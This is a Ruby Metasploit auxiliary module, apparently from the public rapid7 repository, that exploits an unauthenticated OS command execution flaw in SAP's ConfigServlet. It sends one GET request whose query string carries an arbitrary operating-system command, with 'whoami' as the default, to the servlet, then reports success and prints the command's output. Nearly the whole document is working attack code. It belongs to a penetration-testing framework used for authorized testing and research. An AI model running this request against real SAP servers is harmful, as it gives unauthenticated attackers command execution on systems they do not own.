GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
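class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and user-facing options.
  #
  # The only network traffic this module produces is one unauthenticated GET
  # to <TARGETURI>/ConfigServlet carrying a fixed
  # `param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=...` query
  # string; that literal prefix is the element a web-server or proxy log
  # search can key on, hence the IOC_IN_LOGS side-effect note below.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SAP ConfigServlet OS Command Execution',
        'Description' => %q{
          This module allows execution of operating system commands through the SAP
          ConfigServlet without any authentication.
        },
        'Author' => [
          'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
          'Andras Kabai' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '92704'],
          ['EDB', '24963'],
          ['URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
        ],
        'DisclosureDate' => '2012-11-01', # Based on the reference presentation
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(50000),
        OptString.new('CMD', [true, 'The command to execute', 'whoami']),
        OptString.new('TARGETURI', [true, 'Path to ConfigServlet', '/ctc/servlet'])
      ]
    )
  end

  # Sends the command held in the CMD option and reports the servlet's reply.
  #
  # Success is judged solely on the literal "Process created" marker in the
  # response body; the body is then printed verbatim, so whatever the server
  # returned is shown unmodified. A non-200 status or a missing response is
  # reported as a failure without inspecting the body.
  #
  # @return [void]
  def run
    print_status("#{rhost}:#{rport} - Sending remote command: #{datastore['CMD']}")
    uri = normalize_uri(target_uri.path, 'ConfigServlet')

    res = send_request_cgi(
      'uri' => uri,
      'method' => 'GET',
      # The query is kept as a pre-built string rather than 'vars_get' so the
      # fixed ';'-separated prefix is sent unchanged; only the command value
      # is URI-encoded.
      'query' => "param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=#{Rex::Text.uri_encode(datastore['CMD'])}"
    )

    # nil means the request never completed (e.g. timeout); any other status
    # than 200 is treated as failure.
    unless res && res.code == 200
      print_error("#{rhost}:#{rport} - Exploit failed")
      return
    end

    # to_s guards against a response object whose body is nil.
    body = res.body.to_s
    if body.include?('Process created')
      print_good("#{rhost}:#{rport} - Exploited successfully\n")
      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
      print_line("#{rhost}:#{rport} - Output: #{body}")
    else
      print_error("#{rhost}:#{rport} - Exploit failed")
      vprint_error("#{rhost}:#{rport} - Output: #{body}")
    end
  rescue ::Rex::ConnectionError
    # Only send_request_cgi can raise this; the original wrapped just that call,
    # and a method-level rescue ends the run the same way (report and return).
    print_error("#{rhost}:#{rport} - Failed to connect to the server")
  end
end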